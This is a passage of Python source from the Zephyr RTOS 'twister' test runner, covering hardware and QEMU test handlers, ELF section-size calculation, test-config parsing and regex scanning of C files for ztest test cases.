bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.instance.status = "failed"
self.instance.reason = "Serial Device Error"
logger.error("Serial device error: %s" % (str(e)))
self.instance.add_missing_testscases("blocked", "Serial Device Error")
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
if serial_pty:
self.make_device_available(serial_pty)
else:
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testsuite.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
# ignore unencodable unicode chars
logger.debug(stdout.decode(errors = "ignore"))
if proc.returncode != 0:
self.instance.status = "error"
self.instance.reason = "Device issue (Flash error?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
os.write(write_pipe, b'x') # halt the thread
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.status = "error"
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if self.instance.status == "error":
self.instance.add_missing_testscases("blocked", self.instance.reason)
if harness.is_pytest:
harness.pytest_run(self.log)
# sometimes a test instance hasn't been executed successfully with no
# status, in order to include it into final report,
# so fill the results as blocked
self.instance.add_missing_testscases("blocked")
if harness.state:
self.instance.status = harness.state
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.instance.execution_time = handler_time
self._final_handle_actions(harness, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
if serial_pty:
self.make_device_available(serial_pty)
else:
self.make_device_available(serial_device)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testsuite.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process execution time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
#there's possibility we polled nothing because
#of not enough CPU time scheduled by host for
#QEMU process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
if harness.is_pytest:
harness.handle(None)
out_state = harness.state
break
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
if harness.is_pytest:
harness.pytest_run(logfile)
out_state = harness.state
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
handler.instance.execution_time = handler_time
if out_state == "timeout":
handler.instance.status = "failed"
handler.instance.reason = "Timeout"
elif out_state == "failed":
handler.instance.status = "failed"
handler.instance.reason = "Failed"
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.status = "failed"
handler.instance.reason = out_state
else:
handler.instance.status = out_state
handler.instance.reason = "Unknown"
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testsuite.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# twister to judge testing result by console output
is_timeout = True
self.terminate(proc)
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join(0)
if self.thread.is_alive():
logger.debug("Timed out while monitoring QEMU output")
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.instance.status = "failed"
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
self.instance.add_missing_testscases("blocked")
self._final_handle_actions(harness, 0)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.timeout_multiplier = 1.0
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.timeout_multiplier = testing.get("timeout_multiplier", 1.0)
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class ScanPathResult:
"""Result of the TestSuite.scan_path function call.
Attributes:
matches A list of test cases
warnings A string containing one or more
warnings to display
has_registered_test_suites Whether or not the path contained any
calls to the ztest_register_test_suite
macro.
has_run_registered_test_suites Whether or not the path contained at
least one call to
ztest_run_registered_test_suites.
has_test_main Whether or not the path contains a
definition of test_main(void)
ztest_suite_names Names of found ztest suites
"""
def __init__(self,
matches: List[str] = None,
warnings: str = None,
has_registered_test_suites: bool = False,
has_run_registered_test_suites: bool = False,
has_test_main: bool = False,
ztest_suite_names: List[str] = []):
self.matches = matches
self.warnings = warnings
self.has_registered_test_suites = has_registered_test_suites
self.has_run_registered_test_suites = has_run_registered_test_suites
self.has_test_main = has_test_main
self.ztest_suite_names = ztest_suite_names
def __eq__(self, other):
if not isinstance(other, ScanPathResult):
return False
return (sorted(self.matches) == sorted(other.matches) and
self.warnings == other.warnings and
(self.has_registered_test_suites ==
other.has_registered_test_suites) and
(self.has_run_registered_test_suites ==
other.has_run_registered_test_suites) and
self.has_test_main == other.has_test_main and
(sorted(self.ztest_suite_names) ==
sorted(other.ztest_suite_names)))
class TestCase(DisablePyTestCollectionMixin):
def __init__(self, name=None, testsuite=None):
self.duration = 0
self.name = name
self.status = None
self.reason = None
self.testsuite = testsuite
self.output = ""
def __lt__(self, other):
return self.name < other.name
def __repr__(self):
return "<TestCase %s with %s>" % (self.name, self.status)
def __str__(self):
return self.name
class TestSuite(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testsuite_root, workdir, name):
"""TestSuite constructor.
This gets called by TestPlan as it finds and reads test yaml files.
Multiple TestSuite instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testsuite_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testsuite_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.testcases = []
self.name = self.get_unique(testsuite_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.platform_type = []
self.toolchain_exclude = None
self.toolchain_allow = None
self.ts_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
self.ztest_suite_names = []
def add_testcase(self, name):
tc = TestCase(name=name, testsuite=self)
self.testcases.append(tc)
@staticmethod
def get_unique(testsuite_root, workdir, name):
canonical_testsuite_root = os.path.realpath(testsuite_root)
if Path(canonical_zephyr_base) in Path(canonical_testsuite_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testsuite_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testsuite_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
def scan_file(self, inf_name):
regular_suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
registered_suite_regex = re.compile(
br"^\s*ztest_register_test_suite"
br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
new_suite_regex = re.compile(
br"^\s*ZTEST_SUITE\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
# Checks if the file contains a definition of "void test_main(void)"
# Since ztest provides a plain test_main implementation it is OK to:
# 1. register test suites and not call the run function iff the test
# doesn't have a custom test_main.
# 2. register test suites and a custom test_main definition iff the test
# also calls ztest_run_registered_test_suites.
test_main_regex = re.compile(
br"^\s*void\s+test_main\(void\)",
re.MULTILINE)
registered_suite_run_regex = re.compile(
br"^\s*ztest_run_registered_test_suites\("
br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
warnings = None
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
regular_suite_regex_matches = \
[m for m in regular_suite_regex.finditer(main_c)]
registered_suite_regex_matches = \
[m for m in registered_suite_regex.finditer(main_c)]
new_suite_regex_matches = \
[m for m in new_suite_regex.finditer(main_c)]
if registered_suite_regex_matches:
has_registered_test_suites = True
if registered_suite_run_regex.search(main_c):
has_run_registered_test_suites = True
if test_main_regex.search(main_c):
has_test_main = True
if regular_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(regular_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, regular_suite_regex_matches, has_registered_test_suites)
elif registered_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(registered_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, registered_suite_regex_matches, has_registered_test_suites)
elif new_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(new_suite_regex_matches)
testcase_names, warnings = \
self._find_new_ztest_testcases(main_c)
else:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
ztest_suite_names = []
testcase_names, warnings = None, None
return ScanPathResult(
matches=testcase_names,
warnings=warnings,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main,
ztest_suite_names=ztest_suite_names)
@staticmethod
def _extract_ztest_suite_names(suite_regex_matches):
ztest_suite_names = \
[m.group("suite_name") for m in suite_regex_matches]
ztest_suite_names = \
[name.decode("UTF-8") for name in ztest_suite_names]
return ztest_suite_names
def _find_regular_ztest_testcases(self, search_area, suite_regex_matches, is_registered_test_suite):
"""
Find regular ztest testcases like "ztest_unit_test" or similar. Return
testcases' names and eventually found warnings.
"""
testcase_regex = re.compile(
br"""^\s* # empty space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
# ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME),
(?:ztest_
(?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*)
[a-zA-Z0-9_]+\s*,\s*
)?
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?
# Consume the argument that becomes the extra testcase
\(\s*(?P<testcase_name>[a-zA-Z0-9_]+)
# _setup_teardown() variant has two extra arguments that we ignore
(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?
\s*\)""",
# We don't check how it finishes; we don't care
re.MULTILINE | re.VERBOSE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
search_start, search_end = \
self._get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite)
limited_search_area = search_area[search_start:search_end]
testcase_names, warnings = \
self._find_ztest_testcases(limited_search_area, testcase_regex)
achtung_matches = re.findall(achtung_regex, limited_search_area)
if achtung_matches and warnings is None:
achtung = ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
warnings = f"found invalid {achtung} in ztest_test_suite()"
return testcase_names, warnings
@staticmethod
def _get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite):
"""
Get search area boundary based on "ztest_test_suite(...)",
"ztest_register_test_suite(...)" or "ztest_run_test_suite(...)"
functions occurrence.
"""
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
search_start = suite_regex_matches[0].end()
suite_run_match = suite_run_regex.search(search_area)
if suite_run_match:
search_end = suite_run_match.start()
elif not suite_run_match and not is_registered_test_suite:
raise ValueError("can't find ztest_run_test_suite")
else:
search_end = re.compile(br"\);", re.MULTILINE) \
.search(search_area, search_start) \
.end()
return search_start, search_end
def _find_new_ztest_testcases(self, search_area):
"""
Find regular ztest testcases like "ZTEST" or "ZTEST_F". Return
testcases' names and eventually found warnings.
"""
testcase_regex = re.compile(
br"^\s*(?:ZTEST|ZTEST_F)\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,"
br"\s*(?P<testcase_name>[a-zA-Z0-9_]+)\s*",
re.MULTILINE)
return self._find_ztest_testcases(search_area, testcase_regex)
@staticmethod
def _find_ztest_testcases(search_area, testcase_regex):
"""
Parse search area and try to find testcases defined in testcase_regex
argument. Return testcase names and eventually found warnings.
"""
testcase_regex_matches = \
[m for m in testcase_regex.finditer(search_area)]
testcase_names = \
[m.group("testcase_name") for m in testcase_regex_matches]
testcase_names = [name.decode("UTF-8") for name in testcase_names]
warnings = None
for testcase_name in testcase_names:
if not testcase_name.startswith("test_"):
warnings = "Found a test that does not start with test_"
testcase_names = \
[tc_name.replace("test_", "", 1) for tc_name in testcase_names]
return testcase_names, warnings
def scan_path(self, path):
subcases = []
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
ztest_suite_names = []
src_dir_path = self._find_src_dir_path(path)
for filename in glob.glob(os.path.join(src_dir_path, "*.c*")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
raise TwisterRuntimeError(
"%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.has_registered_test_suites:
has_registered_test_suites = True
if result.has_run_registered_test_suites:
has_run_registered_test_suites = True
if result.has_test_main:
has_test_main = True
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
if (has_registered_test_suites and has_test_main and
not has_run_registered_test_suites):
warning = \
"Found call to 'ztest_register_test_suite()' but no "\
"call to 'ztest_run_registered_test_suites()'"
logger.error(warning)
raise TwisterRuntimeError(warning)
return subcases, ztest_suite_names
def parse_subcases(self, test_path):
subcases, ztest_suite_names = self.scan_path(test_path)
# if testcases are provided as part of the yaml, skip this step.
if not self.testcases:
# only add each testcase once
for sub in set(subcases):
name = "{}.{}".format(self.id, sub)
self.add_testcase(name)
if not subcases:
self.add_testcase(self.id)
self.ztest_suite_names = ztest_suite_names
@staticmethod
def _find_src_dir_path(test_dir_path):
"""
Try to find src directory with test source code. Sometimes due to the
optimization reasons it is placed in upper directory.
"""
src_dir_name = "src"
src_dir_path = os.path.join(test_dir_path, src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
src_dir_path = os.path.join(test_dir_path, "..", src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
return ""
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestSuite on a platform
@param test The TestSuite object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testsuite, platform, outdir):
self.testsuite = testsuite
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.execution_time = 0
self.name = os.path.join(platform.name, testsuite.name)
self.run_id = self._get_run_id()
self.build_dir = os.path.join(outdir, platform.name, testsuite.name)
self.run = False
self.testcases = []
self.init_cases()
# Fix an issue with copying objects from testsuite, need better solution.
def init_cases(self):
for c in self.testsuite.testcases:
self.add_testcase(c.name)
def _get_run_id(self):
""" generate run id from instance unique identifier and a random
number"""
hash_object = hashlib.md5(self.name.encode())
random_str = f"{random.getrandbits(64)}".encode()
hash_object.update(random_str)
return hash_object.hexdigest()
